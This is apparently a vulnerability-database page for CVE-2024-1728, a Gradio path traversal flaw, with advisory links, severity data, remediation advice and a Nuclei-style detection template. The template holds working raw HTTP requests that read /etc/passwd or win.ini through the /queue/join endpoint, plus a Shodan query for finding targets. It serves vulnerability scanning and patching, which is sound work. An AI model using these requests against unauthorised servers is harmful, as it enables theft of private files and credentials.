| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| CVE-2024-1728 | 12 Apr 202406:48 | – | circl | |
| gradio 路径遍历漏洞 | 10 Apr 202400:00 | – | cnnvd | |
| CVE-2024-1728 | 10 Apr 202417:07 | – | cve | |
| CVE-2024-1728 Local File Inclusion in gradio-app/gradio | 10 Apr 202417:07 | – | cvelist | |
| Exploit for Path Traversal in Gradio_Project Gradio | 5 Feb 202510:04 | – | githubexploit | |
| Duplicate Advisory: Gradio Local File Inclusion vulnerability | 10 Apr 202418:30 | – | github | |
| Gradio allows users to access arbitrary files | 25 Sep 202421:48 | – | github | |
| Gradio < 4.19.2 Vulnerability - CVE-2024-1728 | 10 Jan 202500:00 | – | nessus | |
| CVE-2024-1728 | 10 Apr 202417:15 | – | nvd | |
| GHSA-3F95-MXQ2-2F63 Duplicate Advisory: Gradio Local File Inclusion vulnerability | 10 Apr 202418:30 | – | osv |
id: CVE-2024-1728
info:
name: Gradio > 4.19.1 UploadButton - Path Traversal
author: isacaya
severity: high
description: |
gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.
impact: |
Attackers can exploit this vulnerability to read arbitrary files on the filesystem, such as private SSH keys, by manipulating the file path in the request to the `/queue/join` endpoint. This issue could potentially lead to remote code execution. The vulnerability is present in the handling of file upload paths, allowing attackers to redirect file uploads to unintended locations on the server.
remediation: |
Update to version 4.19.2.
reference:
- https://github.com/gradio-app/gradio/commit/16fbe9cd0cffa9f2a824a0165beb43446114eec7
- https://huntr.com/bounties/9bb33b71-7995-425d-91cc-2c2a2f2a068a
- https://nvd.nist.gov/vuln/detail/CVE-2024-1728
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1728
cwe-id: CWE-22
epss-score: 0.85393
epss-percentile: 0.99691
metadata:
max-request: 5
verified: true
vendor: gradio
product: gradio
shodan-query: html:"__gradio_mode__"
tags: cve,cve2024,lfi,gradio,intrusive,vuln
http:
- raw:
- |
POST /queue/join HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"data":[{"path":"{{path}}","url":"{{BaseURL}}/file=/help","orig_name":"CHANGELOG.md","size":3549,"mime_type":"text/markdown"}],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"{{randstr}}"}
- |
GET /queue/data?session_hash={{randstr}} HTTP/1.1
Host: {{Hostname}}
- |
GET /file={{extracted_path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: extracted_path
regex:
- "/tmp/gradio/[^/]+/passwd"
- "C:.*\\win\\.ini"
internal: true
payloads:
path:
- /etc/passwd
- /windows/win.ini
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[^:]:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
- 200
# digest: 490a004630440220448bbd74eb34c7a2c7e5b775607e611b26a98eb986a28d500d14d2dfbc6f943f02206d2ab254551a3e8a0dbfd3cca82bb43a987d2f05aa3e2a3eb543f259899235a8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation